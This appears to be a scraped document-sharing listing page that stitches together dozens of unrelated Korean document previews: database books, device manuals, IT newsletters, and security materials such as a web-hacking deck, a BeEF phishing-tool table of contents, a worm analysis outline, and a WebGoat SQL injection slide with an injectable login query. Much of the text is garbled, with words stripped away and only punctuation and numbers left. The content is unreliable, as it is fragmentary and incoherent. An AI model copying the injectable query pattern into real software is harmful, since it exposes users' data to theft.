초보자를 위한 ADO 21일 완성 ADO 21, 21 Sams Teach Yourself ADO 2.5 in 21 Days., 21., 2 1 ADO., ADO.? ADO 21 (VB, VBA, VB ), ADO. 3 (Week). 1, 2, COM+ 3.. HTML,. 3 (week), ADO. 24 1 - ADO OLE DB SQL, UDA(Universal Data Access) ADO.,,

More information

LCD Display

LCD Display LCD Display SyncMaster 460DRn, 460DR VCR DVD DTV HDMI DVI to HDMI LAN USB (MDC: Multiple Display Control) PC. PC RS-232C. PC (Serial port) (Serial port) RS-232C.. > > Multiple Display

More information

Connection 8 22 UniSQLConnection / / 9 3 UniSQL OID SET

Connection 8 22 UniSQLConnection / / 9 3 UniSQL OID SET 135-080 679-4 13 02-3430-1200 1 2 11 2 12 2 2 8 21 Connection 8 22 UniSQLConnection 8 23 8 24 / / 9 3 UniSQL 11 31 OID 11 311 11 312 14 313 16 314 17 32 SET 19 321 20 322 23 323 24 33 GLO 26 331 GLO 26

More information

4? [The Fourth Industrial Revolution] IT :,,,. : (AI), ,, 2, 4 3, : 4 3.

4? [The Fourth Industrial Revolution] IT :,,,. : (AI), ,, 2, 4 3, : 4 3. 2019 Slowalk 4? [The Fourth Industrial Revolution] IT :,,,. : (AI),. 4 2016 1 20,, 2, 4 3, : 4 3. 2 3 4,,,, :, : : (AI, artificial intelligence) > > (2015. 12 ) bot (VR, virtual reality) (AR, augmented

More information

<B1DDC0B6C1A4BAB8C8ADC1D6BFE4B5BFC7E228313232C8A3292E687770>

<B1DDC0B6C1A4BAB8C8ADC1D6BFE4B5BFC7E228313232C8A3292E687770> 금융정보화 주요동향 제122호 2010. 3. 30 1. 금융업계 IT동향 2. IT 동향 3. IT 용어 정보시스템본부 종 합 2010. 3월 제122호 1. 금융업계 IT동향 올해 금융IT핵심 화두는 통합, 그리고 모바일 은행, 스마트폰 뱅킹 서비스 강화 증권업계, 공동 통합보안관제 체계 구축 추진 카드업계, 스마트폰 애플리케이션 개발 확산 미래에셋생명,

More information

3ÆÄÆ®-14

3ÆÄÆ®-14 chapter 14 HTTP >>> 535 Part 3 _ 1 L i Sting using System; using System.Net; using System.Text; class DownloadDataTest public static void Main (string[] argv) WebClient wc = new WebClient(); byte[] response

More information

NATE CP 컨텐츠 개발규격서_V4.4_1.doc

NATE CP 컨텐츠 개발규격서_V4.4_1.doc Rev.A 01/10 This Document is copyrighted by SK Telecom and may not be reproduced without permission 1 Rev.A 01/10 - - - - - - URL (dsplstupper) - Parameter ( SKTUPPER=>SU, SKTMENU=>SM) - - CP - - - - -

More information

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진 WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진 해킹의 종류 웹해킹 네트워크 해킹 시스템(OS)해킹 웹해킹 기법 SQL INJECTION HTML INJECTION Cross Site Scripting HEADER INJECTION 웹해킹 기법 업로드 취약점 다운로드 취약점 INJECTION 나는 사람입니다. 나는

More information

CD-RW_Advanced.PDF

CD-RW_Advanced.PDF HP CD-Writer Program User Guide - - Ver. 2.0 HP CD-RW Adaptec Easy CD Creator Copier, Direct CD. HP CD-RW,. Easy CD Creator 3.5C, Direct CD 3.0., HP. HP CD-RW TEAM ( 02-3270-0803 ) < > 1. CD...3 CD...5

More information

BEef 사용법.pages

BEef 사용법.pages 1.... 3 2.... 3 (1)... 3 (2)... 5 3. BeEF... 7 (1) BeEF... 7 (2)... 8 (3) (Google Phishing)... 10 4. ( )... 13 (1)... 14 (2) Social Engineering... 17 (3)... 19 (4)... 21 5.... 22 (1)... 22 (2)... 27 (3)

More information

nTOP CP 컨텐츠 개발규격서_V4.1_.doc

nTOP CP 컨텐츠 개발규격서_V4.1_.doc Rev.A 01/09 This Document is copyrighted by SK Telecom and may not be reproduced without permission 1 Rev.A 01/09 - - - - - - URL (dsplstupper) - Parameter ( SKTUPPER=>SU, SKTMENU=>SM) - - CP This Document

More information

컴퓨터과학과 교육목표 컴퓨터과학과의 컴퓨터과학 프로그램은 해당분야 에서 학문적 기술을 창의적으로 연구하고 산업적 기술을 주도적으로 개발하는 우수한 인력을 양성 함과 동시에 직업적 도덕적 책임의식을 갖는 IT인 육성을 교육목표로 한다. 1. 전공 기본 지식을 체계적으로

컴퓨터과학과 교육목표 컴퓨터과학과의 컴퓨터과학 프로그램은 해당분야 에서 학문적 기술을 창의적으로 연구하고 산업적 기술을 주도적으로 개발하는 우수한 인력을 양성 함과 동시에 직업적 도덕적 책임의식을 갖는 IT인 육성을 교육목표로 한다. 1. 전공 기본 지식을 체계적으로 2015년 상명대학교 ICT융합대학 컴퓨터과학과 졸업 프로젝트 전시회 2015 Computer Science Graduate Exhibition 2015 Computer Science Graduate Exhibition 1 컴퓨터과학과 교육목표 컴퓨터과학과의 컴퓨터과학 프로그램은 해당분야 에서 학문적 기술을 창의적으로 연구하고 산업적 기술을 주도적으로 개발하는

More information

Windows Live Hotmail Custom Domains Korea

Windows Live Hotmail Custom Domains Korea 매쉬업코리아2008 컨퍼런스 Microsoft Windows Live Service Open API 한국 마이크로소프트 개발자 플랫폼 사업 본부 / 차세대 웹 팀 김대우 (http://www.uxkorea.net 준서아빠 블로그) Agenda Microsoft의 매쉬업코리아2008 특전 Windows Live Service 소개 Windows Live Service

More information

2006_8_14 (8_17 updated) ms06-040 ¿ú(wgareg.exe) ºÐ¼® º¸°í¼�.hwp

2006_8_14 (8_17 updated) ms06-040 ¿ú(wgareg.exe) ºÐ¼® º¸°í¼�.hwp MS06-040 웜(wgareg.exe) 분석 1. 개요 2. 전파 방법 (그림) browser를 오픈 요청 (그림) srvsvc 에 대한 요청 (그림) Exploit 과정 (그림) 웜 전송 3. 감염 시 악성 기능 (그림) 감염 시 개인방화벽 OFF 예 4. 타 시스템 감염을 위한 공격력 5. 위험 요소 6. 사전 예방 방법 7. 감염 시 치료 방법

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Web Browser Web Server ( ) MS Explorer 5.0 WEB Server MS-SQL HTML Image Multimedia IIS Application Web Server ASP ASP platform Admin Web Based ASP Platform Manager Any Platform ASP : Application Service

More information

PowerPoint Template

PowerPoint Template 설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet

More information

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일 Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 Introduce Me!!! Job Jeju National University Student Ubuntu Korean Jeju Community Owner E-Mail: ned3y2k@hanmail.net Blog: http://ned3y2k.wo.tc Facebook: http://www.facebook.com/gyeongdae

More information

Observational Determinism for Concurrent Program Security

Observational Determinism for  Concurrent Program Security 웹응용프로그램보안취약성 분석기구현 소프트웨어무결점센터 Workshop 2010. 8. 25 한국항공대학교, 안준선 1 소개 관련연구 Outline Input Validation Vulnerability 연구내용 Abstract Domain for Input Validation Implementation of Vulnerability Analyzer 기존연구

More information

<B8DEC0CFC0BBC5EBC7D1C0FCC0DABCBCB1DDB0E8BBEABCADC0AFC5EBB0B3B9DFC1F6C4A776312E302E687770>

<B8DEC0CFC0BBC5EBC7D1C0FCC0DABCBCB1DDB0E8BBEABCADC0AFC5EBB0B3B9DFC1F6C4A776312E302E687770> 2010. 2. 1. 지침의개요 가. 목적본지침은 ASP/ERP간전자세금계산서유통을위한기준과절차를제공하기위한것으로전자세금계산서시스템개발자들에게전자세금계산서유통시스템개발에필요한세부절차와방법을제공함으로써, 보다효과적인개발을지원하고자한다. 나. 적용범위본지침은전자세금계산서의유통목적으로 ASP/ERP간 e메일을통해세금계산서원본을전송하기위해개발하는전자세금계산서유통시스템에대해적용한다.

More information

C++Builder ADO Programming (5) - ADO Transaction, Errors

C++Builder ADO Programming (5) - ADO Transaction, Errors C++Builder ADO Programming (5) - ADO Transaction, Errors Collections, Connection Events 지난번 강의에서 우리의 레밍은 TADOConnection의 여러 가지 속성들과 메소드들을 익히고 그것을 사용해서 SQL 문도 실행시키고 저장 프로시저도 호출해 보았다. 그것은 그것 나름대로의 한 방법이며

More information

I 안전 지침 다음 안전 지침을 이용해 사용자 자신과 북톱(Booktop)를 보호하십 시오. M1022 북톱(Booktop) 컴퓨터를 사용할 때 주의: 휴대용 컴퓨터를 신체 위에 직접 올려놓고 장시간 동 안 사용하지 마십시오. 장시간 작동으로 인해 컴퓨터 밑부 분에서

I 안전 지침 다음 안전 지침을 이용해 사용자 자신과 북톱(Booktop)를 보호하십 시오. M1022 북톱(Booktop) 컴퓨터를 사용할 때 주의: 휴대용 컴퓨터를 신체 위에 직접 올려놓고 장시간 동 안 사용하지 마십시오. 장시간 작동으로 인해 컴퓨터 밑부 분에서 저작권 2010 모든 권리는 당사가 소유합니다 중국에서 인쇄 M1022 북톱(Booktop) 사용 설명서 초판: 2010/12 이 사용 설명서에는 새 북톱(Booktop) PC의 설정과 사용에 대한 설명이 들어있습니다. 사용 설명서 안의 정보는 정확성 여부가 신중 히 검토되었으며, 사전 통지 없이 변경될 수 있습니다. 이 사용 설명서의 어떤 부분도 사전 서면

More information

3월 한달 간, 씨앤앰 VOD [지상파 3사 통합월정액] 상품을 리모콘으로 가입하신 고객님 모두에게 VOD 1만원 쿠폰 을 드립니다! 씨앤앰 [지상파3사 통합월정액]이란? 지상파 3사 VOD 무제한 시청! 단 한번 가입으로 지상파 3사의 모든 드라마, 예능 프로그램을

3월 한달 간, 씨앤앰 VOD [지상파 3사 통합월정액] 상품을 리모콘으로 가입하신 고객님 모두에게 VOD 1만원 쿠폰 을 드립니다! 씨앤앰 [지상파3사 통합월정액]이란? 지상파 3사 VOD 무제한 시청! 단 한번 가입으로 지상파 3사의 모든 드라마, 예능 프로그램을 03 씨앤앰 VOD magazine 이 달의 신작 VOD 이 달의 인기 VOD 순위 이 달의 가격인하 VOD 이 달의 무료 VOD Disney 3월 한달 간, 씨앤앰 VOD [지상파 3사 통합월정액] 상품을 리모콘으로 가입하신 고객님 모두에게 VOD 1만원 쿠폰 을 드립니다! 씨앤앰 [지상파3사 통합월정액]이란? 지상파 3사 VOD 무제한 시청! 단 한번 가입으로

More information

Network seminar.key

Network seminar.key Intro to Network .. 2 4 ( ) ( ). ?!? ~! This is ~ ( ) /,,,???? TCP/IP Application Layer Transfer Layer Internet Layer Data Link Layer Physical Layer OSI 7 TCP/IP Application Layer Transfer Layer 3 4 Network

More information

PWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS (

PWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS ( PWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS (http://ddns.hanwha-security.com) Step 1~5. Step, PC, DVR Step 1. Cable Step

More information

미래 서비스를 위한 스마트 클라우드 모델 수동적으로 웹에 접속을 해야만 요구에 맞는 서비스를 받을 수 있었다. 수동적인 아닌 사용자의 상황에 필요한 정보를 지능적으로 파악 하여 그에 맞는 적합한 서비스 를 제공할 수 새로운 연구 개발이 요구 되고 있다. 이를 위하여,

미래 서비스를 위한 스마트 클라우드 모델 수동적으로 웹에 접속을 해야만 요구에 맞는 서비스를 받을 수 있었다. 수동적인 아닌 사용자의 상황에 필요한 정보를 지능적으로 파악 하여 그에 맞는 적합한 서비스 를 제공할 수 새로운 연구 개발이 요구 되고 있다. 이를 위하여, BIZ STORY HOT TREND 2 미래 서비스를 위한 스마트 클라우드 모델 윤용익 숙명여자대학교 정보과학부 교수 HOT TREND 2 1. 서론 클라우드 컴퓨팅은 인터넷이 접속 가능한 공간이면 언제 어디서나 사용자에게 컴퓨팅 자원을 이용할 수 있 게 해주는 기술로써 클라우드 컴퓨팅 시대의 개막은 기 존의 하드웨어 또는 소프트웨어 중심에서 서비스 중심 의

More information

CONTENTS Volume.174 2013 09+10 06 테마 즐겨찾기 빅데이터의 현주소 진일보하는 공개 기술, 빅데이터 새 시대를 열다 12 테마 활동 빅데이터 플랫폼 기술의 현황 빅데이터, 하둡 품고 병렬처리 가속화 16 테마 더하기 국내 빅데이터 산 학 연 관

CONTENTS Volume.174 2013 09+10 06 테마 즐겨찾기 빅데이터의 현주소 진일보하는 공개 기술, 빅데이터 새 시대를 열다 12 테마 활동 빅데이터 플랫폼 기술의 현황 빅데이터, 하둡 품고 병렬처리 가속화 16 테마 더하기 국내 빅데이터 산 학 연 관 방송 통신 전파 KOREA COMMUNICATIONS AGENCY MAGAZINE 2013 VOL.174 09+10 CONTENTS Volume.174 2013 09+10 06 테마 즐겨찾기 빅데이터의 현주소 진일보하는 공개 기술, 빅데이터 새 시대를 열다 12 테마 활동 빅데이터 플랫폼 기술의 현황 빅데이터, 하둡 품고 병렬처리 가속화 16 테마 더하기 국내

More information

슬라이드 1

슬라이드 1 4. Mobile Service Technology Mobile Computing Lecture 2012. 10. 5 안병익 (biahn99@gmail.com) 강의블로그 : Mobilecom.tistory.com 2 Mobile Service in Korea 3 Mobile Service Mobility 4 Mobile Service in Korea 5 Mobile

More information

Copyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs, including any oper

Copyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs, including any oper Windows Netra Blade X3-2B( Sun Netra X6270 M3 Blade) : E37790 01 2012 9 Copyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs,

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Post - Internet Marketing Contents. Internet Marketing. Post - Internet Marketing Trend. Post - Internet Marketing. Paradigm. . Internet Marketing Internet Interactive Individual Interesting International

More information

AGENDA 01 02 03 모바일 산업의 환경변화 모바일 클라우드 서비스의 등장 모바일 클라우드 서비스 융합사례

AGENDA 01 02 03 모바일 산업의 환경변화 모바일 클라우드 서비스의 등장 모바일 클라우드 서비스 융합사례 모바일 클라우드 서비스 융합사례와 시장 전망 및 신 사업전략 2011. 10 AGENDA 01 02 03 모바일 산업의 환경변화 모바일 클라우드 서비스의 등장 모바일 클라우드 서비스 융합사례 AGENDA 01. 모바일 산업의 환경 변화 가치 사슬의 분화/결합 모바일 업계에서도 PC 산업과 유사한 모듈화/분업화 진행 PC 산업 IBM à WinTel 시대 à

More information

1217 WebTrafMon II

1217 WebTrafMon II (1/28) (2/28) (10 Mbps ) Video, Audio. (3/28) 10 ~ 15 ( : telnet, ftp ),, (4/28) UDP/TCP (5/28) centralized environment packet header information analysis network traffic data, capture presentation network

More information

인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 183.8

인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 183.8 차단 IP 국적 공격유형 목적지포트 IPS 룰 222.119.190.175 한국 서비스취약점공격 TCP/110 #14713(POP3 Login Brute Force Attempt-2/3(count 30 seconds 10)) 52.233.160.51 네덜란드 웹해킹 TCP/80 Apache Struts Jakarta Multipart Parser Remote

More information

Backup Exec

Backup Exec (sjin.kim@veritas.com) www.veritas veritas.co..co.kr ? 24 X 7 X 365 Global Data Access.. 100% Storage Used Terabytes 9 8 7 6 5 4 3 2 1 0 2000 2001 2002 2003 IDC (TB) 93%. 199693,000 TB 2000831,000 TB.

More information